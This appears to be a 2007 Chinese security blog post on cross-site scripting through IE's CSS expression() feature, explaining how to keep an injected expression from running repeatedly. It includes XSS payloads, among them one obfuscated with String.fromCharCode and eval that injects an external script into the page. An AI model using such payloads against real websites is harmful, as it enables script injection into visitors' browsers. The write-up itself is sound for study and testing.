我和expression的日与被日 经典分析

by jno
2007-11-29
http://www.ph4nt0m.org

当你第一次用expression方式来xss时，你肯定傻眼了，不停弹框，没法关闭浏览器，最终你只能祭出任务管理器将进程结束。也许你其他TAB页正有填到一半尚未提交的表单，你就这样被expression给日了，心里非常郁闷，于是就要想办法干它。

很多人第一反应就是cookie，没错这是个好办法：
<div style="width: expression(if(document.cookie.indexOf('xxxx')<0){alert(1);document.cookie='xxxx=1;'+document.cookie;})"></div>
不过这样写有个问题，就是被攻击者浏览器只能执行一次你的alert，cookie的作用域大于一次页面执行，适合用来做跨页面的标识，而不是仅仅用来控制一个页面里的某段代码的执行次数，而且你测试起来也挺麻烦，弄得不好就要清cookie。

循着这个思路很自然就会想到在页面里设置标识，于是就有了第二种方法：
<div style="width: expression(if(!window.xxx){alert(1);window.xxx=1;})"></div>
使用全局变量来做标识，使我的代码在这个页面级别只执行一次，这样是一个比较完美的办法，也是目前被使用的最多的办法。

但是到这里总还觉得不爽，虽然我的alert只被执行了一次，但是判断代码还是在被不停的执行，我们还是在被它日，只不过感觉不出来而已了，我们的目标是日它，办法就是执行完我们的代码后删除这条expression，翻阅MSDN你很快能找到合适的方法：

object.style.removeExpression(sPropertyName)

看起来很美，可是你把这个语句放进expression内部用它来删除expression自身却怎么也不能成功，该死的alert还是会一遍遍的弹出来。使用setTimeout延迟执行？失败；使用execScript在全局执行？失败；结合setTimeout和execScript在延迟在全局执行？还是失败；在body尾部append一个外部script来执行？失败；在body尾部append一个外部script并且setTimeout 延迟并且execScript全局执行？草，终于tmd成功了：
<!------1.htm------>
<html>
<style>
body {
width: expression(eval(String.fromCharCode(0x61,0x6C,0x65,0x72,0x74,0x28,0x31,0x29,0x3B,0x69,0x66,0x28,0x64,0x6F,0x63,0x75,0x6D,0x65,0x6E,0x74,0x2E,0x62,0x6F,0x64,0x79,0x29,0x7B,0x76,0x61,0x72,0x20,0x73,0x3D,0x64,0x6F,0x63,0x75,0x6D,0x65,0x6E,0x74,0x2E,0x63,0x72,0x65,0x61,0x74,0x65,0x45,0x6C,0x65,0x6D,0x65,0x6E,0x74,0x28,0x22,0x73,0x63,0x72,0x69,0x70,0x74,0x22,0x29,0x3B,0x64,0x6F,0x63,0x75,0x6D,0x65,0x6E,0x74,0x2E,0x62,0x6F,0x64,0x79,0x2E,0x61,0x70,0x70,0x65,0x6E,0x64,0x43,0x68,0x69,0x6C,0x64,0x28,0x73,0x29,0x3B,0x73,0x2E,0x73,0x72,0x63,0x3D,0x22,0x31,0x2E,0x6A,0x73,0x22,0x3B,0x7D)));
/*alert(1);if(document.body){var s=document.createElement("script");document.body.appendChild(s);s.src="1.js";}*/
}
</style>
<body>
</body>